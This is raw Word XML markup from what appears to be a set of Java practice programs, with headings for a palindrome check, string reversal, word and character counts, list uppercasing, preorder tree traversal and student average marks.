      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00DF111B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to check Palindrome number. Input : 59095</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E3E0F" w14:textId="5DECF0B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p>
    <w:p w14:paraId="5CF1105D"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0DB2E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94153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FEB0A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number is palindrome using Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCBD00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F99DC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um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B25A178"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ang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DB066D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llMa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3651AD3"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C2BB4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97C6EC"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718A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3AE051"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est numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC6F4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9095</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204AC5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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68544105"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4F5E9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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ECB7C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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252F682"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C79FF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F381A" w14:textId="2B41251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FE0F5D" w14:textId="77777777" w:rsidR="00525D83" w:rsidRPr="00CE4B95" w:rsidRDefault="00525D83" w:rsidP="00525D83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E53ED0" w14:textId="3C902A86" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="_Toc197867573"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00445B2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reverse String without using reverse function (Use brute force approach)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
    </w:p>
    <w:p w14:paraId="4AA79DE9" w14:textId="2E6B3B28" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00061DE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E5425" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to reverse String without using reverse function (Use brute force approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B61C026" w14:textId="3CD4FCB3"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2FF2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C32C0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7CA623"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DFE8341"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FE15BA"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ing each character from end to start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994547D"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7A2A08"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BAB610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B62782"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65129"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346EC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p>
    <w:p w14:paraId="448BB7AB"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iginal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11E50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8B0E9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6DBB654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92A793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1998C" w14:textId="5C049642"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B62381A" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00445B2A" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0919EC68" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05E02E99" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EAE9D98" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E205509" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C4963D" w14:textId="0DC15D28" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="360" w:name="_Toc197867574"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="005073CC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r w:rsidR="00C9479A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ount </w:t>
      </w:r>
      <w:r w:rsidR="005073CC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">of each word </w:t>
      </w:r>
      <w:r w:rsidR="008E2B25" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>in a</w:t>
      </w:r>
      <w:r w:rsidR="00C9479A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>
    </w:p>
    <w:p w14:paraId="2F6DB44A" w14:textId="47AAE03B"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50367CA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555A0BB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7A7FF93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1A87AFD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6272437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9417E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066F98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197F7162"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492D7F1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2F0AB7" w14:textId="638D8F52"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BAB49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AFFCB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3A7E25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61907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7DEFE60A"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59126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23F48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168A3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4DAD04"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F36FD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152DB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s (Basic Approach):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186C2C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69EC3B1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2DA09"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363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B77B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6D0B824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6D9130A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76059C9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51FC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 (Java 8 Stream):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB1D8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DC42A8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1A4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2F2E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7FF6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1 w2 w2 w3 w3 w4"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3A1E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p>
    <w:p w14:paraId="4BC792DB"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9B74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06D8B87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552B4BA9" w14:textId="115E148B"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05518" w14:textId="6146DDE1"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62066F" w14:textId="77777777" w:rsidR="00F2494F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F2494F" w:rsidP="00F2494F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46797D67" w14:textId="300AEBE6" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="_Toc197867575"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00AF3117" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Make all elements to Uppercase and create new ArrayList</w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>
    </w:p>
    <w:p w14:paraId="3DCCBC5F" w14:textId="257B9AEB" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00211824">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82B98" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a java 8 program to make all elements of the list to uppercase and create a new ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72636E30"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4C37063C" w14:textId="77777777"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5F6FC6B" w14:textId="3133B5A8"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>//String str = "w1 w2 w2 w3 w3 w4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E7FCC" w14:textId="27CCB511"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3"</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4"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB97061" w14:textId="734B0824"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st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UpperCa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orEa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p>
    <w:p w14:paraId="541906B7" w14:textId="20844B6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE8989" w14:textId="5552F6A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6600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3525346F" w14:textId="07FA5DBA" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="362" w:name="_Toc197867576"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00D82134" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pre</w:t>
      </w:r>
      <w:r w:rsidR="00624CE2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00D82134" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>rder traversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="362"/>
    </w:p>
    <w:p w14:paraId="4D8EC759" w14:textId="77777777" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00A604CB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A604CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program in java to print PreOrder Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F594B68" w14:textId="654F2E7D" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604CB" w:rsidP="00A604CB">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input: Given the root of a binary tree, return the preorder traversal of its nodes' values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAEC0C1" w14:textId="0D97B70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F4517E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48B2BE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Tree node definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49D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465F"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3E9B5CF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p>
    <w:p w14:paraId="694946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1E570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E56B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59510E1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961B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AB43C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54813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eOrderTravers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EC75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63428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order Traversal: Root -&gt; Left -&gt; Right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD208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56D7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23D5AF0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A83A9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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCA2A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left subtree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58947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right subtree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343A0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7B65B"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BB30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2FE89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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFAA28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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3ACFD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244361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2   3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801B21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   \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0419F6B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4   5   6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731ACCE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6634A95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524C0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93A4F1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3CF96DA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7EFF43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887F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p>
    <w:p w14:paraId="3A05127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1D26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122A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09F0F7C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5F332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eorder Traversal: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A94D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p>
    <w:p w14:paraId="416DF4E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14AFE" w14:textId="57077972"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8BD7F7" w14:textId="07EBE36B" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="363" w:name="_Toc197867577"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="009D212D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Calculate average marks of Student and return Student object</w:t>
      </w:r>
      <w:bookmarkEnd w:id="363"/>
    </w:p>
    <w:p w14:paraId="54E8E5D6" w14:textId="3F30DE8E"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2D669A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to calculate average marks of students and return the student object with average marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C62B0C" w14:textId="16BD546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CFB73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7DA59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46667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D526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72E914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088864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6093DC5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79805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073DC8C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4B2F3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60078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0ECEF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526C7A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ks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC617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6F2F3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72C3C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average marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE1D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9761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B145A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EFFDC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r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7750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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82C25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7B58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41AB5E4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D5F2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492B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F22F56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2D294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E95D08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6E94F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5525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892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83CDC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9335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35C5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EB016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76A186E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C279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C6CA5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Average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4D5F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3C64AA6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B40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213E6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5E63D81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6619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8D0C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erage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9ECF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7572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p>
    <w:p w14:paraId="0BF6241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D277E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verageMarks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F40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73B93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5B7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students with marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6CD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0BF329B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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94DD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0BF107B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8C13EE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689745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4531E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83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students with their average marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C51A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446B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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A6B7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C3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6180C4" w14:textId="1065B251"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BBCC807" w14:textId="77777777" w:rsidR="00CF2E5C" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF2E5C" w:rsidP="00365A15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4331FD9D" w14:textId="77777777" w:rsidR="00CF2E5C" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF2E5C" w:rsidP="00365A15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A94EB00" w14:textId="3E3FF313" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="364" w:name="_Toc197867578"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count of each Character in a String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="364"/>
    </w:p>
    <w:p w14:paraId="19AAC21D" w14:textId="4BBC7560"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1C060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B1FABE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1913B98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24C24C3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CF376D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3A05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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA7826"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0A704E8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118078B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3D3C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0652AC" w14:textId="3867C558"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9E769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19392E9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BE251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887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5A79F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6E06348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F18F3A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494AA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2C16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CF0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s (Basic Approach):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
